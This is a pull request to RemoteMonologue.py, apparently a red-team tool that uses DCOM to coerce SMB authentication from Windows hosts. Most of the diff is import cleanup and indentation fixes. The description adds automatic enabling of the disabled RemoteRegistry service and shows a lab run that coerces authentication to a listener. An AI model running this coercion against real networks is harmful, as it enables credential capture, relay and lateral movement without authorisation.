### PR TITLE
Automatically activate remote registry

### DIFF
--- a/RemoteMonologue.py
+++ b/RemoteMonologue.py
@@ -12,33 +12,24 @@ import os
 import struct
 import socket
 import re
-import uuid
-import codecs
 
-from impacket import version
 from impacket.dcerpc.v5.dcom.oaut import IID_IDispatch, string_to_bin, IDispatch, DISPPARAMS, DISPATCH_PROPERTYGET, \
-    VARIANT, VARENUM, DISPATCH_METHOD, DISPATCH_PROPERTYPUT, DISPATCH_PROPERTYPUTREF, DISPID_ARRAY
-from impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION, OBJREF, FLAGS_OBJREF_CUSTOM, OBJREF_CUSTOM, OBJREF_HANDLER, \
+    VARIANT, VARENUM, DISPATCH_METHOD, DISPATCH_PROPERTYPUT
+from impacket.dcerpc.v5.dcomrt import DCOMConnection, OBJREF, FLAGS_OBJREF_CUSTOM, OBJREF_CUSTOM, OBJREF_HANDLER, \
     OBJREF_EXTENDED, OBJREF_STANDARD, FLAGS_OBJREF_HANDLER, FLAGS_OBJREF_STANDARD, FLAGS_OBJREF_EXTENDED, \
     IRemUnknown2, INTERFACE
-from impacket.dcerpc.v5.dtypes import NULL, LONG, MAXIMUM_ALLOWED
+from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
 from impacket.examples import logger
 from impacket.examples.utils import parse_target
 from impacket.krb5.keytab import Keytab
 from impacket.dcerpc.v5.transport import DCERPCTransportFactory
-from impacket import version
 from impacket.dcerpc.v5 import transport, rrp, scmr,lsat, lsad
 from impacket.dcerpc.v5.ndr import NULL
-from impacket.crypto import encryptSecret
 from impacket.smbconnection import SMBConnection
-from impacket.ntlm import compute_lmhash, compute_nthash
 from impacket.smb3structs import *
-from impacket.ldap import ldaptypes
-from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt
-from impacket.system_errors import ERROR_NO_MORE_ITEMS
+from impacket.dcerpc.v5 import transport, rrp, scmr
 from impacket.dcerpc.v5.samr import SID_NAME_USE
 from impacket.dcerpc.v5.rpcrt import DCERPCException
-from impacket.dcerpc.v5 import ndr
 from impacket.dcerpc.v5.dcom import wmi
 
 text_green = '\033[92m'

--- a/RemoteMonologue.py
+++ b/RemoteMonologue.py
@@ -628,7 +628,7 @@ class RemoteMonologue:
     def dcom_coerce(self):
         global text_green, text_blue, text_yellow, text_red, text_end
 
-	   # Initiate DCOM connection
+       # Initiate DCOM connection
         try:
             # Timeout checker
             stringBinding = r'ncacn_ip_tcp:%s[135]' % self.__address
@@ -689,34 +689,34 @@ class RemoteMonologue:
                
             except  (Exception) as e:
                 if str(e).find("OAUT SessionError: unknown error code: 0x0") >= 0:
-                	logging.debug("Got exepcted 0x0 SessionError")
-                	print(text_green + "[+] Coerced SMB authentication! %+35s" % self.__address + text_end)
+                    logging.debug("Got exepcted 0x0 SessionError")
+                    print(text_green + "[+] Coerced SMB authentication! %+35s" % self.__address + text_end)
 
-                	if self.__output != None:
-                	    output_file = open(self.__output, "a")
-                	    output_file.write("[+] Forced SMB authentication for Interactive User," + self.__address + "\n")
-                	    output_file.close()
+                    if self.__output != None:
+                        output_file = open(self.__output, "a")
+                        output_file.write("[+] Forced SMB authentication for Interactive User," + self.__address + "\n")
+                        output_file.close()
                 elif str(e).find("DCOM SessionError: code: 0x8000401a - CO_E_RUNAS_LOGON_FAILURE") >= 0:
                     logging.debug("Got RUNAS_LOGON_FAILURE")
                     print(text_blue + "[~] Local admin but no Interactive User %+47s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[~] Local admin but no Interactive User," + self.__address + "\n")
-                    	output_file.close()
+                        output_file = open(self.__output, "a")
+                        output_file.write("[~] Local admin but no Interactive User," + self.__address + "\n")
+                        output_file.close()
                 elif str(e).find("access_denied") >= 0:
                     logging.debug("Got ACCESS_DENIED")
                     print(text_red + "[-] Access denied %+69s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[-] Access denied," + self.__address + "\n")
-                    	output_file.close()
+                        output_file = open(self.__output, "a")
+                        output_file.write("[-] Access denied," + self.__address + "\n")
+                        output_file.close()
                 elif str(e).find("REGDB_E_CLASSNOTREG") >= 0:
                     logging.debug("Got REGDB_E_CLASSNOTREG")
                     print(text_blue + "[~] Local admin but DCOM class not registered %+41s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[~] DCOM class not registered," + self.__address + "\n")
-                    	output_file.close()
+                        output_file = open(self.__output, "a")
+                        output_file.write("[~] DCOM class not registered," + self.__address + "\n")
+                        output_file.close()
                 else:
                     logging.error(str(e))
                 
@@ -733,36 +733,36 @@ class RemoteMonologue:
                     logging.debug("No route to host")
                     print(text_yellow + "[!] No route to host %+66s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[!] No route to host," + self.__address + "\n")
-                    	output_file.close()
+                        output_file = open(self.__output, "a")
+                        output_file.write("[!] No route to host," + self.__address + "\n")
+                        output_file.close()
             elif str(e).find("Network is unreachable") >= 0:
                     logging.debug("Network is unreachable")
                     print(text_yellow + "[!] Network is unreachable %+60s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[!] Network is unreachable," + self.__address + "\n")
-                    	output_file.close()                    
+                        output_file = open(self.__output, "a")
+                        output_file.write("[!] Network is unreachable," + self.__address + "\n")
+                        output_file.close()                    
             elif str(e).find("timed out") >= 0:
                     logging.debug("Connection timed out")
                     print(text_yellow + "[!] Connection timed out %+62s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[!] Connection timed out," + self.__address + "\n")
-                    	output_file.close()   
+                        output_file = open(self.__output, "a")
+                        output_file.write("[!] Connection timed out," + self.__address + "\n")
+                        output_file.close()   
             elif str(e).find("Connection refused") >= 0:
                     logging.debug("Connection refused")
                     print(text_yellow + "[!] Connection refused %+64s" % self.__address + text_end)
                     if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[!] Connection refused," + self.__address + "\n")
-                    	output_file.close()                   
+                        output_file = open(self.__output, "a")
+                        output_file.write("[!] Connection refused," + self.__address + "\n")
+                        output_file.close()                   
             else:
                 logging.debug("Unkown error: " + str(e) + " for " + self.__address)
                 if self.__output != None:
-                    	output_file = open(self.__output, "a")
-                    	output_file.write("[!] Unknown error," + self.__address + "\n")
-                    	output_file.close()                 
+                        output_file = open(self.__output, "a")
+                        output_file.write("[!] Unknown error," + self.__address + "\n")
+                        output_file.close()                 
 
             
         except KeyboardInterrupt:
@@ -794,7 +794,7 @@ class AuthenticationCoercer():
 
             dispParams = DISPPARAMS(None, False)
             dispParams['rgdispidNamedArgs'] = NULL
-            dispParams['cArgs'] = 2	
+            dispParams['cArgs'] = 2    
             dispParams['cNamedArgs'] = 0
             
             arg0 = VARIANT(None, False)


### PR DESCRIPTION
I used the code from `reg.py` from impacket to autostart the remote registry

```
$ python3 RemoteMonologue.py 'vagrant:vagrant@192.168.56.115' -auth-to test@80 -dcom FileSystemImage -webclient

 __   ___        __  ___  ___        __        __        __   __        ___ 
|__) |__   |\/| /  \  |  |__   |\/| /  \ |\ | /  \ |    /  \ / _` |  | |__  
|  \ |___  |  | \__/  |  |___  |  | \__/ | \| \__/ |___ \__/ \__> \__/ |___ 
                                                                            
                                  
                        v1.0.0 - @AndrewOliveau
                                                
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Querying status for WebClient on 192.168.56.115
[*] WebClient status: RUNNING
[*] Targeting FileSystemImage COM object
[*] Setting RunAs value to Interactive User
[+] Coerced SMB authentication!                      192.168.56.115
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
```